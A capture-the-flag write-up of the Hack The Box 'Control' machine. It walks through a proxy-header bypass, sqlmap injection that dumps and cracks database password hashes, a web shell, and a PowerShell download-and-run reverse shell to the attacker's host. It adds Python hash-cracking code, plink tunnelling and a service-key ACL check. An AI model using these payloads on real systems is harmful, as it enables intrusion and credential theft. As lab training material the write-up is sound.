Hack The Box Control Writeup – 10.10.10.167

Hello, I’m back with the Hack The Box Control writeup for this week. Control is a Windows machine rated “hard” by HTB. The first root blood came “01 days, 05 hours, 32 mins, 55 seconds” after release, which gives you a hint of how hard this box is. Let us start.

Enumeration – Nmap Port Scan

Like all the previous machines, I start with an nmap port scan to see which ports are open and what services are running.

Here are the nmap scan results:

 ⚡ ⚙  root@ns09~/htb/control nmap -sC -sV -Pn 10.10.10.167
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 12:09 +03
Nmap scan report for control.htb (10.10.10.167)
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   Kerberos, LPDString, NULL, NotesRPC, SIPOptions, SMBProgNeg: 
|_    Host '10.10.14.21' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=12/6%Time=5DEA1AE6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,
SF:"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xf
SF:fj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,4A,"F\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.57 seconds
 ⚡ ⚙  root@ns09~/htb/control

The nmap scan showed three open ports: 80 (IIS web server), 135 (MSRPC) and 3306, which the banner identifies as MariaDB even though nmap could not fingerprint the service. The database refuses connections from our IP (“Host '10.10.14.21' is not allowed to connect”), so it is not directly usable. Note also that the remaining 997 ports are filtered, which matters later: a service listening on the box is not necessarily reachable from outside.

A website called “Fidelity” is hosted on the default HTTP port.

There are four pages: index, about, admin and login. The admin and login pages did not show a login form, only the error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page”. An access check that depends on a request header being present points to a misconfiguration, so I proceeded to analyze the source code.

The source code of index.php has a commented-out to-do section:

<!-- To Do: -->
 Import Products
 Link to new payment system
 Enable SSL (Certificates location \\192.168.4.28\myfiles) 
<!-- Header -->

This revealed an internal IP address, 192.168.4.28. I fired up Burp to see what requests are sent and received.

Burp confirmed that nothing in the request identifies a proxy, and the same error comes back whenever I request admin.php or login.php.

So to reach these pages you either need to come through the proxy the site expects, or pretend that you did by adding the header a reverse proxy would add: X-Forwarded-For. Burp makes it easy to add such a header, so I used my already-running Burp. I guessed 192.168.4.28 as the X-Forwarded-For value (the proxy’s address) because it is the only internal IP found in the site’s source code, and it worked. This is the misconfiguration: X-Forwarded-For is set by whoever sends the request, so its presence or value is no proof that the request passed through a trusted proxy.

Header X-Forwarded-For value ==>  "192.168.4.28"

As soon as I forwarded the request in Burp, I was able to access the admin panel (a product page).

SQLi

So the next step was to find SQL injection in the product search. I used Burp to capture the search request so I could hand it to sqlmap.

The captured request:

POST /search_products.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
x-forwarded-for: 192.168.4.28
Connection: close
Upgrade-Insecure-Requests: 1

productName=D-Link+DWA-171

I saved the request as control.txt and ran sqlmap with: sqlmap --all -r control.txt --batch (--all enumerates everything sqlmap can reach, including database users and their password hashes; --batch accepts the default answer to every prompt).

 ⚡ ⚙  root@ns09~/htb/control sqlmap --all -r control.txt --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.12.1#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:03 /2019-12-07/

[14:14:03] [INFO] parsing HTTP request from 'control.txt'
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter 'productName' is dynamic
[14:14:05] [WARNING] POST parameter 'productName' does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter 'productName' might be injectable (possible DBMS: 'MySQL')
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter 'productName' might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter 'productName'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:14:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:14:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:17] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter 'productName' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="36")
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:14:20] [INFO] POST parameter 'productName' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:14:20] [INFO] testing 'MySQL inline queries'
[14:14:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:14:31] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable 
[14:14:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:14:41] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[14:14:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter 'productName' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[14:14:43] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'productName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: '10.4.8-MariaDB'
[14:14:44] [INFO] fetching current user
current user: 'manager@localhost'
[14:14:44] [INFO] fetching current database
current database: 'warehouse'
[14:14:44] [INFO] fetching server hostname
hostname: 'Fidelity'
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'

[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes 
[14:16:19] [INFO] cracked password 'l3tm3!n' for user 'manager'                                                                                                                                                                              
database management system users password hashes:                                                                                                                                                                                            
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

sqlmap found the injection, identified the database and got me what I was looking for: the database users and their password hashes (manager’s came back in clear text).

I can’t do much with the passwords I have: port 3306 refuses remote connections, so I cannot log in to the database directly, and the only way forward is to use the injection itself to write a file. The stacked-queries technique sqlmap confirmed allows a second statement, so a SELECT ... INTO OUTFILE can drop a PHP shell into the web root (this needs the FILE privilege and a writable web root; sqlmap’s later --file-write confirms both hold here). So I decided to use Burp again to send a PHP payload through the injection and create a shell on the system. I found several variants, but used one I modified a bit; my final payload looked like this:

After uploading the shell successfully, I called it to test, and it worked like a charm. Immma hacker boyyy babbyy!!!

PowerCAT Reverse Shell

Now I need a reverse connection from the Control machine. Since the machine is Windows, I went for a PowerShell reverse shell. After a lot of reading and research, I decided to use PowerCat.

Setup:

  • I downloaded powercat.ps1 to the working directory
  • Set up a Python HTTP server to serve it: python -m SimpleHTTPServer 8081
  • Started a netcat listener: nc -lvnp 8080
  • And finally called it from the web shell (in very simple words) to make it work.

The Activator:

http://10.10.10.167/nav1n.php?c=powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.21:8081/powercat.ps1');powercat -c 10.10.14.21 -p 8080 -e cmd"

Note the two ports: powercat.ps1 is downloaded from the HTTP server on 8081, and the shell itself connects back to the netcat listener on 8080 (the netstat output further down shows the established session to 10.10.14.21:8080).

ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/

As soon as I run the above caller my netcat listener got me the reverse shell:

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.167.
Ncat: Connection from 10.10.10.167:50162.
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>
C:\>cd users
cd users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C05D-877F

 Directory of C:\Users

11/05/2019  02:34 PM    <DIR>          .
11/05/2019  02:34 PM    <DIR>          ..
11/05/2019  02:34 PM    <DIR>          Administrator
11/01/2019  11:09 AM    <DIR>          Hector
10/21/2019  04:29 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  42,980,626,432 bytes free

C:\Users>cd Administrator
cd Administrator

Access is denied.
C:\Users>cd Hector
cd Hector

Access is denied.

I have access to the system, but I’m not able to enter the user directories. There are two users, Administrator and Hector, and access to both home directories is denied: the shell runs as the web server’s account, not as either of them.

Building the tunnel (this is a failed step; skip ahead to the “WhiteWinterWolf Webshell” section)

I ran netstat -ano to see which ports are listening and which processes own them.

C:\inetpub\wwwroot>netstat -ano
netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       792
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1904
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       332
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1784
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       592
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       584
  TCP    10.10.10.167:80        10.10.14.21:35928      ESTABLISHED     4
  TCP    10.10.10.167:49677     10.10.14.21:8080       ESTABLISHED     4632
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       792
  TCP    [::]:3306              [::]:0                 LISTENING       1904
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       456
  TCP    [::]:49665             [::]:0                 LISTENING       332
  TCP    [::]:49666             [::]:0                 LISTENING       948
  TCP    [::]:49667             [::]:0                 LISTENING       1784
  TCP    [::]:49668             [::]:0                 LISTENING       592
  TCP    [::]:49669             [::]:0                 LISTENING       584
  UDP    0.0.0.0:123            *:*                                    1980
  UDP    0.0.0.0:5353           *:*                                    1236
  UDP    0.0.0.0:5355           *:*                                    1236
  UDP    127.0.0.1:58934        *:*                                    948
  UDP    [::]:123               *:*                                    1980
  UDP    [::]:5353              *:*                                    1236
  UDP    [::]:5355              *:*                                    1236
C:\inetpub\wwwroot>

I found that WinRM is listening on TCP 5985 (PID 4 is the System process, which hosts the kernel HTTP.sys listener; that is why ports 80 and 5985 share it). It is bound to all interfaces, but nmap showed the port filtered, so the host firewall blocks it from outside. The next step is therefore a tunnel between my Kali box and Control. I will use plink.exe, the PuTTY command-line SSH client, which Kali ships as a Windows binary.

 ⚡  root@ns09~/htb/control locate plink.exe
/usr/share/windows-resources/binaries/plink.exe
 ⚡  root@ns09 ~/htb/control 

Uploading PLink.exe

This turned out to be harder than expected. I tried the following but got an error (the cause is the SMB dialect: Impacket’s smbserver.py only speaks SMB1 unless it is started with -smb2support, and Windows 10 / Server 2019 refuses SMB1 shares):

Setting up the Impacket SMB server

⚡  root@ns09~/impacket/examples master ± python smbserver.py ROPNOP /usr/share/windows-resources/binaries/
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []

Copy PLink.exe using Command Prompt:

C:\inetpub\wwwroot\uploads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C05D-877F

 Directory of C:\inetpub\wwwroot\uploads

12/07/2019  07:00 PM    <DIR>          .
12/07/2019  07:00 PM    <DIR>          ..
11/11/2019  12:59 PM                 6 rev.php
11/11/2019  12:59 PM                 6 rev2.php
11/11/2019  12:59 PM                 6 shell.php
12/07/2019  07:00 PM    <DIR>          test
               3 File(s)             18 bytes
               3 Dir(s)  43,625,472,000 bytes free

C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

WhiteWinterWolf Webshell

So my plan to copy plink the polite way failed so badly that I shut down my laptop and went to sleep. In my sleep the angels told me I could use WhiteWinterWolf’s web shell to upload plink. Here is what I did:

  • I saved WhiteWinterWolf’s web shell PHP script to a file called “nshell.php”
  • I reused the saved request file from my earlier sqlmap run
  • I ran sqlmap again with --file-write to copy the script to C:\inetpub\wwwroot\

My new sqlmap command:

sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php

After running sqlmap, the new shell was uploaded successfully:

⚡ ⚙  root@ns09~/htb/control sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:23:32 /2019-12-09/

[09:23:32] [INFO] parsing HTTP request from 'control2.txt'
[09:23:32] [INFO] resuming back-end DBMS 'mysql' 
[09:23:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[09:23:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
[09:23:32] [INFO] fingerprinting the back-end DBMS operating system
[09:23:33] [INFO] the back-end DBMS operating system is Windows
[09:23:34] [WARNING] potential permission problems detected ('Access denied')
[09:23:47] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want confirmation that the local file '/root/htb/control/nshell.php' has been successfully written on the back-end DBMS file system ('c:/inetpub/wwwroot/nshell.php')? [Y/n] Y
[09:24:00] [INFO] the local file '/root/htb/control/nshell.php' and the remote file 'c:/inetpub/wwwroot/nshell.php' have the same size (7188 B)
[09:24:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 09:24:01 /2019-12-09/

 ⚡ ⚙  root@ns09~/htb/control

WhiteWinterWolf’s PHP web shell upload

As soon as sqlmap confirmed that my shell was uploaded, I opened it in the browser:

I uploaded both nc.exe and plink.exe, to be sure that at least one way of connecting would work.

Uploading plink.exe using WhiteWinterWolf’s PHP web shell

I ran plink.exe first because I wanted to test whether it could do the tunnelling. I know nc.exe will work for sure, but I hadn’t tried plink for tunnelling. Let us try.

The tunnel was created successfully. The -R option asks my Kali SSH server to listen on port 5985 and forward every connection back through the SSH session to 127.0.0.1:5985 on Control:

C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.21
.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.21
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-r----------------b7:52
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
login as: navin
navin@10.10.14.21's password: ----

Linux ns09 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
navin@ns09:~$ 
PuTTY PLINK Tunnel Between Windows and Kali Machines

Note: I was not able to connect as root; the password wasn’t accepted, most likely because OpenSSH’s default PermitRootLogin prohibit-password rejects root password logins. So I used another account called “navin”. Once the tunnel was up, I switched to root on Kali to run my commands.

Now I can run Evil-WinRM from Kali against 127.0.0.1:5985, which the tunnel forwards to WinRM on Control. However, I’m still a low-privileged user, and WinRM needs credentials for a local account, so I need to run Evil-WinRM as Hector. If you remember, the initial sqlmap run revealed three users’ password hashes:

hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

sqlmap got manager’s password in clear text, but Hector’s is still unknown, so I used John to crack his hash. These are MySQL native password hashes, a “*” followed by the hex of SHA1(SHA1(password)); John’s format for them is mysql-sha1 and hashcat’s mode is 300 (hashcat wants the hash without the leading asterisk). The password is l33———tor (sorry, I will not release the password).
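The three hashes sqlmap dumped earlier and the John run here rely on the same check: hash each candidate twice with SHA-1 and compare it against every user’s hash at once. The following added example (mine, not the author’s code) implements that dictionary attack in Python on the page’s own hashes; the wordlist is constructed for the demo and Hector’s real password is not in it.

```python
"""Dictionary attack against MySQL/MariaDB native password hashes.

Added example for this writeup, not the author's code. The three hashes are the
ones sqlmap dumped from the warehouse database; WORDLIST is constructed.
"""
import hashlib
from typing import Dict, Iterable, List

# Exactly as sqlmap printed them (mysql_native_password format).
HASHES = {
    "hector": "*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D",
    "manager": "*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA",
    "root": "*0A4A5CAD344718DC418035A1F4D292BA603134D8",
}

# Constructed mini wordlist; the real run used sqlmap's default list and then John.
WORDLIST = ["password", "fidelity", "l3tm3!n", "Welcome1"]


def mysql_native_hash(password: str) -> str:
    """'*' + uppercase hex of SHA1(SHA1(password)). No salt, so equal passwords
    always produce equal hashes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_mysql_native_hash(value: str) -> bool:
    """True for the 41-character '*'-prefixed format sqlmap labels mysql_passwd."""
    return (len(value) == 41 and value[0] == "*"
            and all(c in "0123456789abcdefABCDEF" for c in value[1:]))


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {user: password} for every hash that a wordlist entry reproduces.

    Because the hash is unsalted, each candidate is hashed once and looked up
    against all users at the same time; users sharing a password fall together.
    """
    targets: Dict[str, List[str]] = {}
    for user, value in hashes.items():
        if is_mysql_native_hash(value):
            targets.setdefault(value.upper(), []).append(user)
    found: Dict[str, str] = {}
    for word in wordlist:
        candidate = word.rstrip("\r\n")   # tolerate lines read straight from a file
        for user in targets.get(mysql_native_hash(candidate), []):
            found[user] = candidate
    return found


if __name__ == "__main__":
    cracked = crack(HASHES, WORDLIST)
    for user, password in cracked.items():
        print(f"{user}: {password}")
    print("still uncracked:", sorted(set(HASHES) - set(cracked)))
```

Unsalted hashes crack cheaply: one SHA-1 pair per candidate covers every user in the dump, which is why sqlmap’s default wordlist recovered manager’s password in under two minutes.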

Time to run Evil-WinRM as Hector, with the tunnel endpoint 127.0.0.1:5985 as the target instead of the box’s own IP:

Getting User.txt

Getting Root

To get root we need to escalate the privileges of our current user, Hector. A couple of articles on Windows privilege escalation give a great overview; I had to read several of them to find the right way to become Administrator of Control.

Let us see what our user Hector is capable of.

*Evil-WinRM* PS C:\Users\Hector\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Is Hector a member of the Administrators group?

*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list

Currently stored credentials:

* NONE *
*Evil-WinRM* PS C:\Users\Hector\Desktop> 

cmdkey /list didn’t give me any stored credentials either. It’s getting a bit hard at this stage.

Checking ACLs (Access Control Lists) is the most important post-exploitation step: it shows where the compromised user has write access he should not have. I concentrated on the service keys under HKLM\System\CurrentControlSet\services to see what rights Hector has there. The command is: get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"

The command returned a long list: Hector has FullControl over a large number of service keys. FullControl on a service key means he can rewrite values such as ImagePath, so whatever binary that service launches the next time it is started runs with the service’s own privileges, typically SYSTEM. That is the lead to follow.

*Evil-WinRM* PS C:\Users\Hector\Desktop> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
